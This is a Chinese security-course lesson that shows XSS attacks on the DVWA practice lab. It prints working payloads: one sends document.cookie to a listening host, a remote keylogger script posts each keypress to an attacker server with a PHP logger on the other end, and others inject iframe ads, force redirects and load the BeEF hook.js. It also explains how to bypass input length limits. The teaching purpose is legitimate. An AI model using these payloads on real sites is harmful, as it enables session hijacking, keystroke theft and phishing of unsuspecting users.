   

你好，我是王昊天。

在上一节课程中，我们学习了什么是XSS攻击，并且介绍了XSS攻击的不同种类。在攻击示例的代码中，我们仅仅是让网页弹出一个警告框，看上去XSS攻击并没有什么作用，但实际上，它的危害性是比较大的。你会好奇XSS攻击会造成哪些危害吗？

这节课，让我们一起来深入了解一下。

XSS攻击的危害
--------

XSS攻击的危害主要包括四种类型，我已经将它们整理在下图中，它们分别是盗取cookie、按键记录和钓鱼、广告植入以及欺骗跳转。

![图片](assets/53d1ad9644a140128007e98dee7edb38.jpg)

首先我们来学习具有代表性的XSS攻击利用，盗取cookie，看看攻击者是如何用XSS攻击实现对cookie的窃取。

### 盗取cookie

cookie在英文中的意思为甜品、饼干，不过这里盗取cookie可不是偷饼干的意思哦。在HTTP请求中，cookie代表着登录信息，我们在Web应用登录成功后，服务器端会生成一个cookie。然后服务器端会将这个生成的cookie发送给我们，供我们之后访问的时候使用。

如果攻击者拿到cookie信息了，那他就可以实现登录我们的账号，这是非常危险的，所以我们平时需要保护好我们的cookie信息。

在了解完cookie是什么之后，让我们用一个示例，一起看看XSS攻击是如何获得cookie信息的。

**这是一个DVWA靶场**，我们在登陆后选择DOM型XSS，获得如下页面：

![图片](assets/c30c4cd28efc4d68aa0337b43eb5e50b.jpg)

在上一讲的实战部分中，我们成功的对这个页面进行了XSS注入攻击，其中使用的payload为：

```javascript
<script>alert(1)</script>
```

在之前的学习中，我们知道它可以让页面弹出一个警告框，但如果我们将这个payload改为如下：

```javascript
<script>var pic=document.createElement("img");pic.src="http://127.0.0.1:2222/getCookie?"+escape(document.cookie)</script>
```

这个payload会调用JavaScript创建一个Element对象，之后将这个对象的src设置为我们监听的地址端口，向这个地址用GET方式上传参数document.cookie，这样我们就能窃取到用户的cookie啦。

![图片](assets/cd6083eba95d4e57999f383b5bc317f0.jpg)

可以看到，**我们已经收到这个GET请求了，它的cookie值也被我们接收到了**。

到这里，你已经学习了用XSS攻击来盗取cookie的用法。接下来，让我们来学习如何用XSS攻击实现按键记录以及钓鱼。

### 按键记录和钓鱼

首先我们来看看如何实现按键记录。

我们仍然选择DVWA的XSS(DOM)靶场做测试，只需要更换payload即可，将payload设置为：

```javascript
<script src=http://192.168.3.193/keylogger.js></script>
```

这段代码可以去调用远程地址中的JavaScript文件，使得keylogger.js中的代码被执行。这里的keylogger.js的内容为：

```javascript
document.onkeypress = function(evt) {
    evt = evt || window.event;
    key = String.fromCharCode(evt.charCode);
    if(key) {
        var http = new XMLHttpRequest();
        var param = encodeURI(key);
        http.open("POST","http://192.168.3.193/keylogger.php",true);
        http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}
```

它创建了一个监听按键的事件，这个事件可以记录用户在当前页面按下的每一个键，并将接收到的按键通过POST方式上传到攻击者用来存储按键记录的服务器上。其中keylogger.php的代码为：

```php
<?php
  $key=$_POST['key'];
  $logfile="keylog.txt";
  $fp = fopen($logfile,"a");
  fwrite($fp,$key);
  fclose($fp);
?>
```

它可以将接收到的key记录到keylog.txt文件中，**这样就能实现按键记录的功能了**。

我们胡乱的在被攻击的页面按下一些键，发现我们用来记录按键的服务器已经获取到了按键内容，并将它们存储在keylog.txt中。

![](assets/7d9e953c63e64a22b14defef672b214a.jpg)

我们还可以将这个按键记录做一下加工，使得用户可以输入一些敏感信息例如账号、密码等信息。我们可以用JavaScript创建出一个伪造的登陆框，这样用户很可能会上当，在这里输入自己的用户名和密码，我们可以利用之前的按键记录获取到这些信息。**这种行为就是钓鱼攻击**，因为它本质上和钓鱼非常类似，在钓鱼中我们就会利用鱼饵，将锋利的鱼钩伪装成美味的食物，这样就能骗得鱼儿上钩。

相信到这里你已经明白了如何用XSS攻击来实现按键记录以及钓鱼。接下来，让我们学习用XSS实现广告植入的方式吧。

### 广告植入

想要做广告植入，那我们需要用存储型XSS注入，这样就可以使得所有访问受攻击页面的用户都会看到广告。

这里我们选择用DVWA的存储型XSS作为示例，如下图，这里需要输入一个姓名和消息。

![图片](assets/bf28c033165c43898a163424fa5ef736.jpg)

经过测试后，我们发现这个Message框内会受到XSS攻击，于是直接可以将负载改为：

```javascript
<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='1000' height='2000' allowTransparency src=https://time.geekbang.org/course/detail/100055001-283034></iframe>");</script>
```

这段恶意负载可以在当前页面以行的方式输出src对应的内容，这样我们把广告的地址设置为src即可。可以看到广告已经弹出，这就是用XSS实现广告植入的方法。

在测试的过程中，你可能会发现我们无法输入完整的负载，这是因为DVWA对这个输入框有长度限制，**我们有两种方法可以绕过这一输入限制**。

第一种，我们先随意输入符合长度要求的Message内容，之后用BurpSuite去进行拦截修改，将Message的内容修改为我们想要设置的恶意负载，这样就可以绕过输入长度限制。

第二种，我们可以去修改页面的限制代码，首先在Message输入框内右键，选择检查，这样关于它的代码就会高亮显示。

![图片](assets/4c68f872add04b9daebb32a51398dfbf.jpg)

在图中，我们可以看到它限制了最多输入50个字符，我们可以将这个数字改为1000或者更大，来满足我们对负载长度的要求。修改过后，我们就可以任意输入想要的负载啦。这里也是在前端进行的修改。

![图片](assets/0ece512a8a3941b3ad39851898636252.jpg)

下面，让我们继续学习XSS的危害类型，看看如何用XSS去实现欺骗跳转。

### 欺骗跳转

有的网页希望增加访问量，或者吸引用户访问，那么就可能会用XSS攻击来实现这一目的。下面我们继续以DVWA靶场中的存储型XSS作为示例。

为了实现欺骗跳转，我们需要将负载设置为：

```javascript
<script>window.location.href=“跳转的目的地址”;</script>
```

这段负载也是JavaScript代码，它可以使得当前页面跳转到设置的目的地址，这就是跳转产生的原因。注意，这里同样是需要绕过输入长度的限制的哦。

这样，当我们访问被攻击的页面时，页面会自动跳转到攻击者设置的地址中，如果攻击者将这个地址伪造为被攻击的页面，那么很容易迷惑访问用户，使得用户认为这就是被攻击的页面，**但事实上，用户已经落入到攻击者的圈套之中了。**

这就是用XSS实现欺骗跳转的方法。到这里，你已经学完了常见的XSS攻击利用方法，事实上，这就是一个任意JavaScript命令执行漏洞，我们只要更换不同的JavaScript语句，就可以实现这些攻击行为。

上述内容都是我们对XSS攻击的手动利用，接下来，让我们来学习一款XSS攻击自动利用神器——BeEF。

BeEF的使用
-------

我们都知道Beef是牛肉的意思，这款名为BeEF的软件也是非常牛的。**我们利用它可以进行各种各样的攻击操作，并且不需要我们手动进行一些负载的设计**，下面让我们一起来学习它吧。

首先我们要来安装这款软件，我们可以在kali虚拟机中使用 `sudo apt install beef-xss` 进行BeEF的安装，如果失败，那么我们运行 `sudo apt-get update` 进行apt的更新，然后重新安装即可。

安装完成之后，我们就可以用命令 `sudo beef-xss` 来打开这个软件，可以看到它会自动弹出一个Web页面，这就是这个软件的用户界面。

![图片](assets/1923eabb0edd49cb88ef875a0026d767.jpg)

我们选择DVWA的存储型XSS攻击来做测试，让你可以更好地理解这款工具。

那么在利用BeEF前，我们首先需要进行XSS攻击。

![图片](assets/5fcf74284b904511aa7a3edcb8453d61.jpg)

和之前我们手动攻击一样，需要在Message框内输入恶意负载，由于我们BeEF工具所在的服务器地址为192.168.3.101，所以我们将负载设置为：

```javascript
<script src="http://192.168.3.101:3000/hook.js"></script>
```

这样，每当这个页面被访问时，都会触发我们注入的JavaScript代码，使得页面向我们的恶意服务器请求hook.js文件，其中你可以简单认为hook.js文件是BeEF的一个接口，之后我们在BeEF调用的命令都是通过这个接口来实现的。

完成了接口的设置之后，我们在BeEF的页面，可以看到BeEF中的Hooked Browsers一栏已经显示出被攻击的目标。

![图片](assets/c6e3a15655834be3a9ee1d0e7967d923.jpg)

这里192.168.3.124是我搭建的DVWA靶场的地址，代表的是被攻击服务器IP，而192.168.3.102代表的是访问被攻击服务器的用户机器的IP。我们点击Current Browser就可以进行我们想要的攻击行为啦。

![图片](assets/33dad6b974f246aca866cbe924294f7a.jpg)

首先我们选中Commands这一栏，然后根据描述选择其中我们想要发起的攻击行为，例如：GET Cookie。

![图片](assets/ceb452b7c4c144d1a37ff40aeeb79269.jpg)

可以看到我们已经获取到了cookie信息。**这比我们手动去获取cookie简单很多。**

这就是BeEF的用法介绍，当然它具有很多有趣的攻击功能，下面我再介绍它的一个功能，那就是改变页面内容。

![图片](assets/fcffed64545d4eb5bc1793ab894832b0.jpg)

我们可以在Deface Content中对内容进行设置，然后点击执行按钮，可以发现我们的DVWA靶场已经变为了刚刚设计的内容。

![图片](assets/364c3bba80484eaf9cdb10715811dbce.jpg)

其实BeEF的非常强大，它具有几百个不同的攻击命令，你可以一一尝试去把玩它们。

总结
--

在这节课程中，我们可以感受到XSS攻击的可怕之处，并且清楚了它的危害性。

首先我们学习了对XSS攻击的手动利用，包括了盗取cookie、按键记录和钓鱼、广告植入以及欺骗跳转这些不同的攻击手段。但事实上，我们都是利用的JavaScript代码注入，页面中一切JavaScript代码可以实现的功能，我们都能实现。所以实现XSS攻击的能力，和JavaScript的掌握程度息息相关。

然后，我们学习了XSS攻击神器——BeEF，利用它我们不需要再亲自构造JavaScript代码，而是利用设计好的代码直接发起我们想要的攻击行为，这给我们带来了极大的便利。

思考题
---

除了这节课中提到的XSS攻击种类，你还能想到别的攻击种类吗？

欢迎在评论区留下你的思考。如果觉得今天的内容对你有所帮助的话，也欢迎你把课程分享给其他同事或朋友，我们共同学习进步！